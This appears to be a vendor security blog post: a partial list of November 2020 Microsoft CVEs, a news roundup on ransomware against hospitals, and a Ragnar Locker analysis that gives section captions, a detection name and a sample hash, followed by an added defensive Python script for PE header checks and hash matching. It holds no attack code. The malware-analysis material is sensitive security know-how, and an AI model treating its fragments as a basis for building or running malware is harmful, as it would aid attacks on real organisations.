CVE-2020-17066 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17067 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17068 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17069 Windows NDIS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17070 Windows Update Medic Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17071 Windows Delivery Optimization Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17073 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17074 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17075 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17076 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17077 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17078 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17079 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17081 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17082 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17083 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17084 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17085 Microsoft Exchange Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17086 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17090 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17091 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17100 Visual Studio Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-17101 HEIF Image Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17102 WebP Image Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17104 Visual Studio Code JSHint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17105 AV1 Video Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17106 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17107 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17108 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17109 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17113 Windows Camera Codec Information Disclosure Vulnerability
There are no known exploits in the wild.

Cybersecurity News & Trends – 11-06-20

This week, there were no reports of cybercriminal meddling in the U.S. election. But hospitals, government agencies, human rights groups, embassies and more weren’t so lucky.


SonicWall in the News

FBI Warns That Hackers Are Targeting Hospitals While Coronavirus Admissions Surge — Vox

  • The FBI has warned of an increase in ransomware attacks, particularly Ryuk, on hospitals.
    * Syndicated on MSN

Ryuk This For A Game Of Soldiers: Ransomware-flingers Actively Targeting Hospitals In The US, Cyber Agencies Warn — The Register

  • While countries such as the UK, Germany and India saw declines in Ryuk, the U.S. saw a staggering 145.2 million ransomware hits – a 139 per cent year-on-year increase.

Surge In Ryuk Ransomware Attacks Has Hospitals On Alert — Computer Weekly

  • Ryuk has surged during 2020, according to statistics provided by SonicWall’s Capture Labs, which has booked 67.3 million Ryuk attacks in 2020, one-third of all ransomware incidents so far this year.

Most Organizations Don’t Have An Election Cyber War Room. They Don’t Need One — Cybersecurity Dive

  • The latest technological developments are almost irrelevant if security is absent from company culture. It’s a matter of reminding organizations of their security hygiene.

Industry News

Officials on alert for potential cyber threats after a quiet Election Day — The Hill

  • Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day.

Scam PSA: Ransomware gangs don’t always delete stolen data when paid — Bleeping Computer

  • Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays a ransom.

No indication foreign governments have successfully interfered with 2020 voting: DHS officials — The Washington Times

  • Department of Homeland Security officials said the federal government is confident that the nation’s voting systems are secure and unaffected by foreign interference, but they cautioned that America’s adversaries may still attempt to create problems.

UK cyber-threat agency confronts Covid-19 attacks — BBC

  • More than a quarter of the incidents which the UK’s National Cyber Security Centre (NCSC) responded to were COVID-related, according to its latest annual report.

Hacker is selling 34 million user records stolen from 17 companies — Bleeping Computer

  • A threat actor is selling account databases containing an aggregate total of 34 million user records that they claim were stolen from seventeen companies during data breaches.

North Korean Group Kimsuky Targets Government Agencies With New Malware — Security Week

  • North Korea-linked threat actor Kimsuky was recently observed using brand new malware in attacks on government agencies and human rights activists, Cybereason’s security researchers say.

Hackers Bearing Down on U.S. Hospitals Have More Attacks Planned — Bloomberg

  • A Russia-based ransomware group responsible for a new wave of attacks against U.S. hospitals is laying the groundwork to cripple at least ten more.

First the Good News: Number of Breaches Down 51% Year Over Year — Dark Reading

  • But the number of records put at risk saw a massive increase.

US shares info on Russian malware used to target parliaments, embassies — Bleeping Computer

  • US Cyber Command today shared information on malware implants used by Russian hacking groups in attacks targeting multiple ministries of foreign affairs, national parliaments, and embassies.

Hackers are on the hunt for Oracle servers vulnerable to potent exploit — Ars Technica

  • Hackers are scanning the Internet for machines that have yet to patch a recently disclosed flaw that forces Oracle’s WebLogic server to execute malicious code, a researcher warned Wednesday night.

In Case You Missed It

Ragnar Locker Ransomware

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Ragnar Locker Ransomware.

Cyberattacks using Ragnar Ransomware have impacted Biological E Ltd, Capcom, and Campari Group.
A description of the corporations that were hit last week and this week is below:

  • Biological E limited is a privately held biopharmaceutical company based in Hyderabad, Telangana, India.
  • Capcom Co., Ltd. is a Japanese video game developer and publisher.
  • Campari is an Italian company active since 1860 in the branded beverage industry. It produces spirits, wines, and soft drinks.

Ragnar injects a module capable of collecting sensitive data from infected machines and uploads the data it finds to the attackers’ servers. The ransomware notifies the victim of the files that will be released to the public if the ransom is not paid.

Ransomware document:

Further down the document:

Ragnar Key is at the bottom of the document:

Static Layer Information:

Overview of sample, checking for any corruption within the PE file format.

Command-Line overview of sample:

Dynamic Information:

Shellcode Buffer:

Shellcode Entry:

Some Shellcode Functionality:

Anti-Debugging Block:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: RagnarLocker.RSM_2 (Trojan)

Appendix:

Sample SHA256 Hash: 0766beb30c575fc68d1ca134bd53c086d2ce63b040e4d0bbd6d89d8c26ca04f6
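The static-layer step above ("checking for any corruption within the PE file format") and the appendix hash are two checks an analyst runs before anything else on a suspect binary. The following is an added example, not code from SonicWall or from this post: it walks the DOS header, PE signature, COFF header and section table with every offset bounds-checked, so a truncated or tampered file produces an error entry rather than a crash, and it compares the file's SHA256 against a watchlist seeded with the hash quoted in the appendix. The minimal PE image built by `build_sample_pe` is constructed for the example and is not the Ragnar Locker sample; the function and field names are this example's own.

```python
import hashlib
import struct

# Hash quoted in this post's appendix, kept here as a one-entry IoC watchlist.
KNOWN_BAD_SHA256 = {
    "0766beb30c575fc68d1ca134bd53c086d2ce63b040e4d0bbd6d89d8c26ca04f6",
}

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64"}


def check_pe_header(data: bytes) -> dict:
    """Parse DOS header -> PE signature -> COFF header -> section table.

    Every offset is bounds-checked before it is dereferenced, so a malformed
    file yields a dict with an 'error' key instead of raising an exception.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"error": "missing MZ signature or file shorter than DOS header"}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # Need room for 'PE\0\0' plus the 20-byte COFF header.
    if e_lfanew + 24 > len(data):
        return {"error": "e_lfanew points outside the file"}
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"error": "missing PE signature at e_lfanew"}
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    if opt_size < 2:
        return {"error": "optional header too small to hold Magic"}
    sect_off = e_lfanew + 24 + opt_size
    if sect_off + 40 * nsections > len(data):
        return {"error": "section table truncated"}
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]

    sections = []
    for i in range(nsections):
        name, vsize, vaddr, raw_size, raw_ptr, *_ = struct.unpack_from(
            "<8sIIIIIIHHI", data, sect_off + 40 * i)
        # A section whose raw data lies past EOF is the classic sign of a
        # truncated download or a header edited to confuse tools.
        if raw_ptr + raw_size > len(data):
            return {"error": f"section {i} raw data extends past end of file"}
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": raw_size,
        })
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "pe32plus": magic == 0x20B,
        "timestamp": timestamp,
        "characteristics": chars,
        "sections": sections,
    }


def triage(data: bytes) -> dict:
    """Hash the file, match it against the watchlist, then sanity-check the PE layout."""
    digest = hashlib.sha256(data).hexdigest()
    report = {"sha256": digest, "known_bad": digest in KNOWN_BAD_SHA256}
    report.update(check_pe_header(data))
    return report


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (not a real sample): one .text section."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=x86, 1 section, timestamp, no symbols, 224-byte optional header,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE.
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0x5FA00000, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 222          # Magic = PE32
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000,
                          0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    header = dos + b"PE\0\0" + coff + optional + section
    return header.ljust(0x600, b"\0")                           # room for raw data at 0x400


if __name__ == "__main__":
    sample = build_sample_pe()
    print(triage(sample))
    print(check_pe_header(sample[:0x150]))   # truncated inside the section table
```

In practice the watchlist would be loaded from a feed rather than hard-coded, and the header walk is the minimum needed to decide whether a file is worth handing to a full parser such as the one behind the command-line overview shown above; anything that trips an error here should be treated as either damaged in transit or deliberately malformed.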